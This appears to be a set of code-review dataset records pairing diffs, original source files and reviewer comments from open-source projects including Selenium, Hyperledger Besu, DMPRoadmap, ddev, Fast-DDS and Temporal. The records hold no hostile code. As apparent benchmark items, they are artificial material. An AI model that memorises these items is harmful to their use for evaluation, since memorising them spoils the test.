-      log.info("Cleaning test environment");
+      log.finest("Cleaning test environment");
       TestEnvironment environment = GlobalTestEnvironment.get();
       if (environment != null) {
         environment.stop();
1
// Licensed to the Software Freedom Conservancy (SFC) under one // or more contributor license agreements. See the NOTICE file // distributed with this work for additional information // regarding copyright ownership. The SFC licenses this file // to you under the Apache License, Version 2.0 (the // "License"); you may not use this file except in compliance // with the License. You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, // software distributed under the License is distributed on an // "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY // KIND, either express or implied. See the License for the // specific language governing permissions and limitations // under the License. package com.thoughtworks.selenium; import com.thoughtworks.selenium.testing.SeleniumTestEnvironment; import org.junit.ClassRule; import org.junit.rules.ExternalResource; import org.junit.rules.RuleChain; import org.junit.rules.TestRule; import org.openqa.selenium.environment.GlobalTestEnvironment; import org.openqa.selenium.environment.TestEnvironment; import java.util.logging.Logger; public class BaseSuite { private static final Logger log = Logger.getLogger(BaseSuite.class.getName()); public static ExternalResource testEnvironment = new ExternalResource() { @Override protected void before() { log.info("Preparing test environment"); GlobalTestEnvironment.get(SeleniumTestEnvironment.class); System.setProperty("webdriver.remote.shorten_log_messages", "true"); } @Override protected void after() { log.info("Cleaning test environment"); TestEnvironment environment = GlobalTestEnvironment.get(); if (environment != null) { environment.stop(); GlobalTestEnvironment.set(null); } } }; public static ExternalResource browser = new ExternalResource() { @Override protected void after() { log.info("Stopping browser"); try { InternalSelenseTestBase.destroyDriver(); } catch (SeleniumException ignored) { // Nothing sane to do } } }; @ClassRule public static TestRule chain = RuleChain.outerRule(testEnvironment).around(browser); }
1
16,446
This is in test code: understanding what we're doing is important in this context.
SeleniumHQ-selenium
java
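The review comment above (on the log-level change in BaseSuite) reflects how `java.util.logging` levels behave: under the default configuration both loggers and the console handler publish at `INFO`, so the `finest` calls introduced by the patch would produce no output during a normal test run. A minimal sketch of that behaviour follows; the class name is illustrative and not part of the Selenium code base.

```java
import java.util.logging.ConsoleHandler;
import java.util.logging.Level;
import java.util.logging.Logger;

public class LogLevelSketch {
  private static final Logger log = Logger.getLogger(LogLevelSketch.class.getName());

  public static void main(String[] args) {
    // Under the default java.util.logging configuration both the logger and
    // the ConsoleHandler publish at INFO, so this message is printed...
    log.info("Preparing test environment");

    // ...while this one is silently discarded.
    log.finest("Preparing test environment");

    // Seeing FINEST output requires lowering both the logger and a handler,
    // which test environments rarely do:
    ConsoleHandler handler = new ConsoleHandler();
    handler.setLevel(Level.FINEST);
    log.addHandler(handler);
    log.setLevel(Level.FINEST);
    log.finest("Now this message is published");
  }
}
```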
@@ -76,8 +76,8 @@ public class CommandLineUtils {
    * @param isMainOptionCondition the conditions to test dependent options against. If all
    *     conditions are true, dependent options will be checked.
    * @param dependentOptionsNames a list of option names that can't be used if condition is met.
-   *     Example: if --min-gas-price is in the list and condition is that either --miner-enabled or
-   *     --goquorum-compatibility-enabled should not be false, we log a warning.
+   *     Example: if --min-gas-price is in the list and condition is that --miner-enabled should not
+   *     be false, we log a warning.
    */
   public static void checkMultiOptionDependencies(
       final Logger logger,
1
/* * Copyright ConsenSys AG. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on * an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the * specific language governing permissions and limitations under the License. * * SPDX-License-Identifier: Apache-2.0 */ package org.hyperledger.besu.cli.util; import org.hyperledger.besu.util.StringUtils; import java.util.Arrays; import java.util.List; import java.util.stream.Collectors; import org.apache.logging.log4j.Logger; import picocli.CommandLine; public class CommandLineUtils { public static final String DEPENDENCY_WARNING_MSG = "{} has been ignored because {} was not defined on the command line."; public static final String MULTI_DEPENDENCY_WARNING_MSG = "{} ignored because none of {} was defined."; /** * Check if options are passed that require an option to be true to have any effect and log a * warning with the list of affected options. * * <p>Note that in future version of PicoCLI some options dependency mechanism may be implemented * that could replace this. See https://github.com/remkop/picocli/issues/295 * * @param logger the logger instance used to log the warning * @param commandLine the command line containing the options we want to check * @param mainOptionName the name of the main option to test dependency against. Only used for * display. * @param isMainOptionCondition the condition to test the options dependencies, if true will test * if not won't * @param dependentOptionsNames a list of option names that can't be used if condition is met. * Example: if --miner-coinbase is in the list and condition is that --miner-enabled should * not be false, we log a warning. */ public static void checkOptionDependencies( final Logger logger, final CommandLine commandLine, final String mainOptionName, final boolean isMainOptionCondition, final List<String> dependentOptionsNames) { if (isMainOptionCondition) { final String affectedOptions = getAffectedOptions(commandLine, dependentOptionsNames); if (!affectedOptions.isEmpty()) { logger.warn(DEPENDENCY_WARNING_MSG, affectedOptions, mainOptionName); } } } /** * Check if options are passed that require an option to be true to have any effect and log a * warning with the list of affected options. Multiple main options may be passed to check * dependencies against. * * <p>Note that in future version of PicoCLI some options dependency mechanism may be implemented * that could replace this. See https://github.com/remkop/picocli/issues/295 * * @param logger the logger instance used to log the warning * @param commandLine the command line containing the options we want to check * @param mainOptions the names of the main options to test dependency against. Only used for * display. * @param isMainOptionCondition the conditions to test dependent options against. If all * conditions are true, dependent options will be checked. * @param dependentOptionsNames a list of option names that can't be used if condition is met. * Example: if --min-gas-price is in the list and condition is that either --miner-enabled or * --goquorum-compatibility-enabled should not be false, we log a warning. 
*/ public static void checkMultiOptionDependencies( final Logger logger, final CommandLine commandLine, final List<String> mainOptions, final List<Boolean> isMainOptionCondition, final List<String> dependentOptionsNames) { if (isMainOptionCondition.stream().allMatch(isTrue -> isTrue)) { final String affectedOptions = getAffectedOptions(commandLine, dependentOptionsNames); if (!affectedOptions.isEmpty()) { final String joinedMainOptions = StringUtils.joiningWithLastDelimiter(", ", " or ").apply(mainOptions); logger.warn(MULTI_DEPENDENCY_WARNING_MSG, affectedOptions, joinedMainOptions); } } } private static String getAffectedOptions( final CommandLine commandLine, final List<String> dependentOptionsNames) { return commandLine.getCommandSpec().options().stream() .filter( option -> Arrays.stream(option.names()).anyMatch(dependentOptionsNames::contains) && !option.stringValues().isEmpty()) .map(option -> option.names()[0]) .collect( Collectors.collectingAndThen( Collectors.toList(), StringUtils.joiningWithLastDelimiter(", ", " and "))); } }
1
25,465
We should probably still have an example with multiple option names, even if you have to make one up. Or maybe we don't need this method?
hyperledger-besu
java
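One way to address the reviewer's request above is to keep a two-option example in the Javadoc of `checkMultiOptionDependencies` even after `--goquorum-compatibility-enabled` goes away, treating the named flags purely as illustrations. The sketch below is only a suggestion for the wording; the class wrapper and imports exist solely to make the fragment self-contained, the second flag is explicitly made up, and the method body is unchanged from the original file.

```java
import java.util.List;

import org.apache.logging.log4j.Logger;
import picocli.CommandLine;

public class CommandLineUtilsDocSketch {
  /**
   * @param dependentOptionsNames a list of option names that can't be used if the condition is
   *     met. Example: if --min-gas-price is in the list and the condition is that neither
   *     --miner-enabled nor --some-other-mining-flag (a made-up option) may be false, we log a
   *     warning.
   */
  public static void checkMultiOptionDependencies(
      final Logger logger,
      final CommandLine commandLine,
      final List<String> mainOptions,
      final List<Boolean> isMainOptionCondition,
      final List<String> dependentOptionsNames) {
    // Body unchanged; see the original CommandLineUtils above.
  }
}
```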
@@ -246,9 +246,9 @@ class PlansController < ApplicationController
     file_name = @plan.title.gsub(/ /, "_")

     respond_to do |format|
-      format.html
-      format.csv { send_data @exported_plan.as_csv(@sections, @unanswered_question, @question_headings), filename: "#{file_name}.csv" }
-      format.text { send_data @exported_plan.as_txt(@sections, @unanswered_question, @question_headings, @show_details), filename: "#{file_name}.txt" }
+      format.html { render layout: false }
+      format.csv { send_data @plan.as_csv(@show_sections_questions), filename: "#{file_name}.csv" }
+      format.text { send_data render_to_string(partial: 'shared/export/plan_txt'), filename: "#{file_name}.txt" }
       format.docx { render docx: 'export', filename: "#{file_name}.docx" }
       format.pdf do
         render pdf: file_name,
1
class PlansController < ApplicationController include ConditionalUserMailer require 'pp' helper PaginableHelper helper SettingsTemplateHelper after_action :verify_authorized, except: [:overview] def index authorize Plan @plans = Plan.active(current_user).page(1) @organisationally_or_publicly_visible = Plan.organisationally_or_publicly_visible(current_user).order(:title => :asc).page(1) end # GET /plans/new # ------------------------------------------------------------------------------------ def new @plan = Plan.new authorize @plan # Get all of the available funders and non-funder orgs @funders = Org.funder.joins(:templates).where(templates: {published: true}).uniq.sort{|x,y| x.name <=> y.name } @orgs = (Org.institution + Org.managing_orgs).flatten.uniq.sort{|x,y| x.name <=> y.name } # Get the current user's org @default_org = current_user.org if @orgs.include?(current_user.org) flash[:notice] = "#{_('This is a')} <strong>#{_('test plan')}</strong>" if params[:test] @is_test = params[:test] ||= false respond_to :html end # POST /plans # ------------------------------------------------------------------- def create @plan = Plan.new authorize @plan # We set these ids to -1 on the page to trick ariatiseForm into allowing the autocomplete to be blank if # the no org/funder checkboxes are checked off org_id = (plan_params[:org_id] == '-1' ? '' : plan_params[:org_id]) funder_id = (plan_params[:funder_id] == '-1' ? '' : plan_params[:funder_id]) # If the template_id is blank then we need to look up the available templates and return JSON if plan_params[:template_id].blank? # Something went wrong there should always be a template id respond_to do |format| flash[:alert] = _('Unable to identify a suitable template for your plan.') format.html { redirect_to new_plan_path } end else # Otherwise create the plan @plan.principal_investigator = current_user.surname.blank? ? nil : "#{current_user.firstname} #{current_user.surname}" @plan.principal_investigator_email = current_user.email orcid = current_user.identifier_for(IdentifierScheme.find_by(name: 'orcid')) @plan.principal_investigator_identifier = orcid.identifier unless orcid.nil? @plan.funder_name = plan_params[:funder_name] @plan.visibility = (plan_params['visibility'].blank? ? Rails.application.config.default_plan_visibility : plan_params[:visibility]) @plan.template = Template.find(plan_params[:template_id]) if plan_params[:title].blank? @plan.title = current_user.firstname.blank? ? _('My Plan') + '(' + @plan.template.title + ')' : current_user.firstname + "'s" + _(" Plan") else @plan.title = plan_params[:title] end if @plan.save @plan.assign_creator(current_user) # pre-select org's guidance and the default org's guidance ids = (Org.managing_orgs << org_id).flatten.uniq ggs = GuidanceGroup.where(org_id: ids, optional_subset: false, published: true) if !ggs.blank? then @plan.guidance_groups << ggs end default = Template.default msg = "#{success_message(_('plan'), _('created'))}<br />" if !default.nil? && default == @plan.template # We used the generic/default template msg += " #{_('This plan is based on the default template.')}" elsif [email protected]_of.nil? # We used a customized version of the the funder template msg += " #{_('This plan is based on the')} #{plan_params[:funder_name]}: '#{@plan.template.title}' #{_('template with customisations by the')} #{plan_params[:org_name]}" else # We used the specified org's or funder's template msg += " #{_('This plan is based on the')} #{@plan.template.org.name}: '#{@plan.template.title}' template." 
end respond_to do |format| flash[:notice] = msg format.html { redirect_to plan_path(@plan) } end else # Something went wrong so report the issue to the user respond_to do |format| flash[:alert] = failed_create_error(@plan, 'Plan') format.html { redirect_to new_plan_path } end end end end # GET /plans/show def show @plan = Plan.eager_load(params[:id]) authorize @plan @visibility = @plan.visibility.present? ? @plan.visibility.to_s : Rails.application.config.default_plan_visibility @editing = (!params[:editing].nil? && @plan.administerable_by?(current_user.id)) # Get all Guidance Groups applicable for the plan and group them by org @all_guidance_groups = @plan.get_guidance_group_options @all_ggs_grouped_by_org = @all_guidance_groups.sort.group_by(&:org) @selected_guidance_groups = @plan.guidance_groups # Important ones come first on the page - we grab the user's org's GGs and "Organisation" org type GGs @important_ggs = [] @important_ggs << [current_user.org, @all_ggs_grouped_by_org[current_user.org]] if @all_ggs_grouped_by_org.include?(current_user.org) @all_ggs_grouped_by_org.each do |org, ggs| if org.organisation? @important_ggs << [org,ggs] end # If this is one of the already selected guidance groups its important! if !(ggs & @selected_guidance_groups).empty? @important_ggs << [org,ggs] unless @important_ggs.include?([org,ggs]) end end # Sort the rest by org name for the accordion @important_ggs = @important_ggs.sort_by{|org,gg| (org.nil? ? '' : org.name)} @all_ggs_grouped_by_org = @all_ggs_grouped_by_org.sort_by {|org,gg| (org.nil? ? '' : org.name)} @selected_guidance_groups = @selected_guidance_groups.collect{|gg| gg.id} @based_on = (@plan.template.customization_of.nil? ? @plan.template : Template.where(dmptemplate: @plan.template.customization_of).first) respond_to :html end # PUT /plans/1 # PUT /plans/1.json def update @plan = Plan.find(params[:id]) authorize @plan attrs = plan_params # Save the guidance group selections guidance_group_ids = params[:guidance_group_ids].blank? ? [] : params[:guidance_group_ids].map(&:to_i).uniq save_guidance_selections(guidance_group_ids) respond_to do |format| if @plan.update_attributes(attrs) format.html { redirect_to @plan, :editing => false, notice: success_message(_('plan'), _('saved')) } format.json {render json: {code: 1, msg: success_message(_('plan'), _('saved'))}} else flash[:alert] = failed_update_error(@plan, _('plan')) format.html { render action: "edit" } format.json {render json: {code: 0, msg: failed_update_error(@plan, _('plan'))}} end end end def share @plan = Plan.find(params[:id]) if @plan.present? authorize @plan # Get the roles where the user is not a reviewer @plan_roles = @plan.roles.select{ |r| !r.reviewer? } else redirect_to(plans_path) end end def destroy @plan = Plan.find(params[:id]) authorize @plan if @plan.destroy respond_to do |format| format.html { redirect_to plans_url, notice: success_message(_('plan'), _('deleted')) } end else respond_to do |format| flash[:alert] = failed_create_error(@plan, _('plan')) format.html { render action: "edit" } end end end # GET /status/1.json # only returns json, why is this here? def status @plan = Plan.find(params[:id]) authorize @plan respond_to do |format| format.json { render json: @plan.status } end end def answer @plan = Plan.find(params[:id]) authorize @plan if !params[:q_id].nil? 
respond_to do |format| format.json { render json: @plan.answer(params[:q_id], false).to_json(:include => :options) } end else respond_to do |format| format.json { render json: {} } end end end def download @plan = Plan.find(params[:id]) authorize @plan @phase_options = @plan.phases.order(:number).pluck(:title,:id) @export_settings = @plan.settings(:export) render 'download' end def export @plan = Plan.includes(:answers).joins(:answers).find(params[:id]) authorize @plan @show_coversheet = params[:export][:project_details].present? @show_sections_questions = params[:export][:question_headings].present? @show_unanswered = params[:export][:unanswered_questions].present? @hash = @plan.as_pdf(@show_coversheet) @formatting = @plan.settings(:export).formatting file_name = @plan.title.gsub(/ /, "_") respond_to do |format| format.html format.csv { send_data @exported_plan.as_csv(@sections, @unanswered_question, @question_headings), filename: "#{file_name}.csv" } format.text { send_data @exported_plan.as_txt(@sections, @unanswered_question, @question_headings, @show_details), filename: "#{file_name}.txt" } format.docx { render docx: 'export', filename: "#{file_name}.docx" } format.pdf do render pdf: file_name, margin: @formatting[:margin], footer: { center: _('Created using the %{application_name}. Last modified %{date}') % {application_name: Rails.configuration.branding[:application][:name], date: l(@plan.updated_at.to_date, formats: :short)}, font_size: 8, spacing: (@formatting[:margin][:bottom] / 2) - 4, right: '[page] of [topage]' } end end end def duplicate plan = Plan.find(params[:id]) authorize plan @plan = Plan.deep_copy(plan) respond_to do |format| if @plan.save @plan.assign_creator(current_user) format.html { redirect_to @plan, notice: success_message(_('plan'), _('copied')) } else format.html { redirect_to plans_path, alert: failed_create_error(@plan, 'Plan') } end end end # POST /plans/:id/visibility def visibility plan = Plan.find(params[:id]) if plan.present? authorize plan if plan.visibility_allowed? plan.visibility = plan_params[:visibility] if plan.save deliver_if(recipients: plan.owner_and_coowners, key: 'owners_and_coowners.visibility_changed') do |r| UserMailer.plan_visibility(r,plan).deliver_now() end render status: :ok, json: { msg: success_message(_('plan\'s visibility'), _('changed')) } else render status: :internal_server_error, json: { msg: _('Error raised while saving the visibility for plan id %{plan_id}') %{ :plan_id => params[:id]} } end else render status: :forbidden, json: { msg: _('Unable to change the plan\'s status since it is needed at least '\ '%{percentage} percentage responded') %{ :percentage => Rails.application.config.default_plan_percentage_answered } } end else render status: :not_found, json: { msg: _('Unable to find plan id %{plan_id}') %{ :plan_id => params[:id]} } end end def set_test plan = Plan.find(params[:id]) authorize plan plan.visibility = (params[:is_test] === "1" ? :is_test : :privately_visible) if plan.save render json: {code: 1, msg: (plan.is_test? ? 
_('Your project is now a test.') : _('Your project is no longer a test.') )} else render status: :bad_request, json: {code: 0, msg: _("Unable to change the plan's test status")} end end def request_feedback plan = Plan.find(params[:id]) authorize plan alert = _('Unable to submit your request for feedback at this time.') begin if plan.request_feedback(current_user) redirect_to share_plan_path(plan), notice: _('Your request for feedback has been submitted.') else redirect_to share_plan_path(plan), alert: alert end rescue Exception redirect_to share_plan_path(plan), alert: alert end end def overview begin plan = Plan.overview(params[:id]) authorize plan render(:overview, locals: { plan: plan }) rescue ActiveRecord::RecordNotFound flash[:alert] = _('There is no plan associated with id %{id}') %{ :id => params[:id] } redirect_to(action: :index) end end private def plan_params params.require(:plan).permit(:org_id, :org_name, :funder_id, :funder_name, :template_id, :title, :visibility, :grant_number, :description, :identifier, :principal_investigator, :principal_investigator_email, :principal_investigator_identifier, :data_contact, :data_contact_email, :data_contact_phone, :guidance_group_ids) end def save_guidance_selections(guidance_group_ids) all_guidance_groups = @plan.get_guidance_group_options plan_groups = @plan.guidance_groups guidance_groups = GuidanceGroup.where(id: guidance_group_ids) all_guidance_groups.each do |group| # case where plan group exists but not in selection if plan_groups.include?(group) && ! guidance_groups.include?(group) # remove from plan groups @plan.guidance_groups.delete(group) end # case where plan group dosent exist and in selection if !plan_groups.include?(group) && guidance_groups.include?(group) # add to plan groups @plan.guidance_groups << group end end @plan.save end # different versions of the same template have the same dmptemplate_id # but different version numbers so for each set of templates with the # same dmptemplate_id choose the highest version number. def get_most_recent( templates ) groups = Hash.new templates.each do |t| k = t.dmptemplate_id if !groups.has_key?(k) groups[k] = t else other = groups[k] if other.version < t.version groups[k] = t end end end groups.values end def fixup_hash(plan) rollup(plan, "notes", "answer_id", "answers") rollup(plan, "answers", "question_id", "questions") rollup(plan, "questions", "section_id", "sections") rollup(plan, "sections", "phase_id", "phases") plan["template"]["phases"] = plan.delete("phases") ghash = {} plan["guidance_groups"].map{|g| ghash[g["id"]] = g} plan["plans_guidance_groups"].each do |pgg| pgg["guidance_group"] = ghash[ pgg["guidance_group_id"] ] end plan["template"]["org"] = Org.find(plan["template"]["org_id"]).serializable_hash() end # find all object under src_plan_key # merge them into the items under obj_plan_key using # super_id = id # so we have answers which each have a question_id # rollup(plan, "answers", "quesiton_id", "questions") # will put the answers into the right questions. def rollup(plan, src_plan_key, super_id, obj_plan_key) id_to_obj = Hash.new() plan[src_plan_key].each do |o| id = o[super_id] if !id_to_obj.has_key?(id) id_to_obj[id] = Array.new end id_to_obj[id] << o end plan[obj_plan_key].each do |o| id = o["id"] if id_to_obj.has_key?(id) o[src_plan_key] = id_to_obj[ id ] end end plan.delete(src_plan_key) end end
1
17,406
I believe respond_to whitelists the formats passed to the block so if we don't want to display html, we can just remove the line format.html...
DMPRoadmap-roadmap
rb
@@ -21,7 +21,7 @@ var LocalDevStopCmd = &cobra.Command{
 		err = app.Stop()
 		if err != nil {
 			log.Println(err)
-			util.Failed("Failed to stop containers for %s. Run `ddev list` to ensure your site exists.", app.ContainerName())
+			util.Failed("Failed to stop containers for %s. Run `ddev list` to ensure your site exists. error=", app.ContainerName(), err)
 		}

 		util.Success("Application has been stopped.")
1
package cmd

import (
	log "github.com/Sirupsen/logrus"
	"github.com/drud/ddev/pkg/util"
	"github.com/spf13/cobra"
)

// LocalDevStopCmd represents the stop command
var LocalDevStopCmd = &cobra.Command{
	Use:   "stop",
	Short: "Stop an application's local services.",
	Long:  `Stop will turn off the local containers and not remove them.`,
	Run: func(cmd *cobra.Command, args []string) {
		app, err := getActiveApp()
		if err != nil {
			log.Fatalf("Could not find an active ddev configuration, have you run 'ddev config'?: %v", err)
		}

		err = app.Stop()
		if err != nil {
			log.Println(err)
			util.Failed("Failed to stop containers for %s. Run `ddev list` to ensure your site exists.", app.ContainerName())
		}

		util.Success("Application has been stopped.")
	},
}

func init() {
	RootCmd.AddCommand(LocalDevStopCmd)
}
1
11,051
stylistic nitpick: I _feel_ like we've largely shown errors like this as "error: " vs. "error=". IMO colon/space reads better.
drud-ddev
go
@@ -18,11 +18,16 @@
  */

 #include <fastdds/rtps/writer/RTPSWriter.h>
+
+#include <fastdds/dds/log/Log.hpp>
+
 #include <fastdds/rtps/history/WriterHistory.h>
 #include <fastdds/rtps/messages/RTPSMessageCreator.h>
-#include <fastdds/dds/log/Log.hpp>
-#include <rtps/participant/RTPSParticipantImpl.h>
+
+#include <rtps/history/BasicPayloadPool.hpp>
+#include <rtps/history/CacheChangePool.h>
 #include <rtps/flowcontrol/FlowController.h>
+#include <rtps/participant/RTPSParticipantImpl.h>

 #include <mutex>
1
// Copyright 2016 Proyectos y Sistemas de Mantenimiento SL (eProsima). // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. /* * @file RTPSWriter.cpp * */ #include <fastdds/rtps/writer/RTPSWriter.h> #include <fastdds/rtps/history/WriterHistory.h> #include <fastdds/rtps/messages/RTPSMessageCreator.h> #include <fastdds/dds/log/Log.hpp> #include <rtps/participant/RTPSParticipantImpl.h> #include <rtps/flowcontrol/FlowController.h> #include <mutex> namespace eprosima { namespace fastrtps { namespace rtps { RTPSWriter::RTPSWriter( RTPSParticipantImpl* impl, const GUID_t& guid, const WriterAttributes& att, WriterHistory* hist, WriterListener* listen) : Endpoint(impl, guid, att.endpoint) , m_pushMode(true) , mp_history(hist) , mp_listener(listen) , is_async_(att.mode == SYNCHRONOUS_WRITER ? false : true) , m_separateSendingEnabled(false) , locator_selector_(att.matched_readers_allocation) , all_remote_readers_(att.matched_readers_allocation) , all_remote_participants_(att.matched_readers_allocation) , liveliness_kind_(att.liveliness_kind) , liveliness_lease_duration_(att.liveliness_lease_duration) , liveliness_announcement_period_(att.liveliness_announcement_period) , next_{nullptr} { mp_history->mp_writer = this; mp_history->mp_mutex = &mp_mutex; logInfo(RTPS_WRITER, "RTPSWriter created"); } RTPSWriter::~RTPSWriter() { logInfo(RTPS_WRITER, "RTPSWriter destructor"); // Deletion of the events has to be made in child destructor. 
mp_history->mp_writer = nullptr; mp_history->mp_mutex = nullptr; } CacheChange_t* RTPSWriter::new_change( const std::function<uint32_t()>& dataCdrSerializedSize, ChangeKind_t changeKind, InstanceHandle_t handle) { logInfo(RTPS_WRITER, "Creating new change"); CacheChange_t* ch = nullptr; if (!mp_history->reserve_Cache(&ch, dataCdrSerializedSize)) { logWarning(RTPS_WRITER, "Problem reserving Cache from the History"); return nullptr; } ch->kind = changeKind; if (m_att.topicKind == WITH_KEY && !handle.isDefined()) { logWarning(RTPS_WRITER, "Changes in KEYED Writers need a valid instanceHandle"); } ch->instanceHandle = handle; ch->writerGUID = m_guid; return ch; } SequenceNumber_t RTPSWriter::get_seq_num_min() { CacheChange_t* change; if (mp_history->get_min_change(&change) && change != nullptr) { return change->sequenceNumber; } else { return c_SequenceNumber_Unknown; } } SequenceNumber_t RTPSWriter::get_seq_num_max() { CacheChange_t* change; if (mp_history->get_max_change(&change) && change != nullptr) { return change->sequenceNumber; } else { return c_SequenceNumber_Unknown; } } uint32_t RTPSWriter::getTypeMaxSerialized() { return mp_history->getTypeMaxSerialized(); } bool RTPSWriter::remove_older_changes( unsigned int max) { logInfo(RTPS_WRITER, "Starting process clean_history for writer " << getGuid()); std::lock_guard<RecursiveTimedMutex> guard(mp_mutex); bool limit = (max != 0); bool remove_ret = mp_history->remove_min_change(); bool at_least_one = remove_ret; unsigned int count = 1; while (remove_ret && (!limit || count < max)) { remove_ret = mp_history->remove_min_change(); ++count; } return at_least_one; } CONSTEXPR uint32_t info_dst_message_length = 16; CONSTEXPR uint32_t info_ts_message_length = 12; CONSTEXPR uint32_t data_frag_submessage_header_length = 36; uint32_t RTPSWriter::getMaxDataSize() { return calculateMaxDataSize(mp_RTPSParticipant->getMaxMessageSize()); } uint32_t RTPSWriter::calculateMaxDataSize( uint32_t length) { uint32_t maxDataSize = mp_RTPSParticipant->calculateMaxDataSize(length); maxDataSize -= info_dst_message_length + info_ts_message_length + data_frag_submessage_header_length; //TODO(Ricardo) inlineqos in future. #if HAVE_SECURITY if (getAttributes().security_attributes().is_submessage_protected) { maxDataSize -= mp_RTPSParticipant->security_manager().calculate_extra_size_for_rtps_submessage(m_guid); } if (getAttributes().security_attributes().is_payload_protected) { maxDataSize -= mp_RTPSParticipant->security_manager().calculate_extra_size_for_encoded_payload(m_guid); } #endif // if HAVE_SECURITY return maxDataSize; } void RTPSWriter::add_guid( const GUID_t& remote_guid) { const GuidPrefix_t& prefix = remote_guid.guidPrefix; all_remote_readers_.push_back(remote_guid); if (std::find(all_remote_participants_.begin(), all_remote_participants_.end(), prefix) == all_remote_participants_.end()) { all_remote_participants_.push_back(prefix); } } void RTPSWriter::compute_selected_guids() { all_remote_readers_.clear(); all_remote_participants_.clear(); for (LocatorSelectorEntry* entry : locator_selector_.transport_starts()) { if (entry->enabled) { add_guid(entry->remote_guid); } } } void RTPSWriter::update_cached_info_nts() { locator_selector_.reset(true); mp_RTPSParticipant->network_factory().select_locators(locator_selector_); } bool RTPSWriter::destinations_have_changed() const { return false; } GuidPrefix_t RTPSWriter::destination_guid_prefix() const { return all_remote_participants_.size() == 1 ? 
all_remote_participants_.at(0) : c_GuidPrefix_Unknown; } const std::vector<GuidPrefix_t>& RTPSWriter::remote_participants() const { return all_remote_participants_; } const std::vector<GUID_t>& RTPSWriter::remote_guids() const { return all_remote_readers_; } bool RTPSWriter::send( CDRMessage_t* message, std::chrono::steady_clock::time_point& max_blocking_time_point) const { RTPSParticipantImpl* participant = getRTPSParticipant(); return locator_selector_.selected_size() == 0 || participant->sendSync(message, locator_selector_.begin(), locator_selector_.end(), max_blocking_time_point); } const LivelinessQosPolicyKind& RTPSWriter::get_liveliness_kind() const { return liveliness_kind_; } const Duration_t& RTPSWriter::get_liveliness_lease_duration() const { return liveliness_lease_duration_; } const Duration_t& RTPSWriter::get_liveliness_announcement_period() const { return liveliness_announcement_period_; } } // namespace rtps } // namespace fastrtps } // namespace eprosima
1
19,802
We could put this implementation in `RTPSWriter::create_change_pool` and avoid an extra function.
eProsima-Fast-DDS
cpp
@@ -25,6 +25,7 @@
 package persistencetests

 import (
+	"fmt"
 	"time"

 	"github.com/pborman/uuid"
1
// The MIT License // // Copyright (c) 2020 Temporal Technologies Inc. All rights reserved. // // Copyright (c) 2020 Uber Technologies, Inc. // // Permission is hereby granted, free of charge, to any person obtaining a copy // of this software and associated documentation files (the "Software"), to deal // in the Software without restriction, including without limitation the rights // to use, copy, modify, merge, publish, distribute, sublicense, and/or sell // copies of the Software, and to permit persons to whom the Software is // furnished to do so, subject to the following conditions: // // The above copyright notice and this permission notice shall be included in // all copies or substantial portions of the Software. // // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR // IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, // FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE // AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER // LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, // OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN // THE SOFTWARE. package persistencetests import ( "time" "github.com/pborman/uuid" "github.com/stretchr/testify/require" commonpb "go.temporal.io/api/common/v1" enumspb "go.temporal.io/api/enums/v1" workflowpb "go.temporal.io/api/workflow/v1" "go.temporal.io/server/common/dynamicconfig" "go.temporal.io/server/common/log/tag" "go.temporal.io/server/common/metrics" "go.temporal.io/server/common/namespace" "go.temporal.io/server/common/payload" "go.temporal.io/server/common/persistence" "go.temporal.io/server/common/persistence/cassandra" persistencetests "go.temporal.io/server/common/persistence/persistence-tests" "go.temporal.io/server/common/persistence/visibility" "go.temporal.io/server/common/persistence/visibility/manager" "go.temporal.io/server/common/primitives/timestamp" "go.temporal.io/server/common/resolver" "go.temporal.io/server/common/searchattribute" ) type ( // VisibilityPersistenceSuite tests visibility persistence VisibilityPersistenceSuite struct { // override suite.Suite.Assertions with require.Assertions; this means that s.NotNil(nil) will stop the test, // not merely log an error *require.Assertions persistencetests.TestBase VisibilityMgr manager.VisibilityManager } ) // SetupSuite implementation func (s *VisibilityPersistenceSuite) SetupSuite() { s.DefaultTestCluster.SetupTestDatabase() cfg := s.DefaultTestCluster.Config() var err error s.VisibilityMgr, err = visibility.NewStandardManager( cfg, resolver.NewNoopResolver(), dynamicconfig.GetIntPropertyFn(1000), dynamicconfig.GetIntPropertyFn(1000), metrics.NewNoopMetricsClient(), s.Logger) if err != nil { // s.NoError doesn't work here. s.Logger.Fatal("Unable to create visibility manager", tag.Error(err)) } } // SetupTest implementation func (s *VisibilityPersistenceSuite) SetupTest() { // Have to define our overridden assertions in the test setup. 
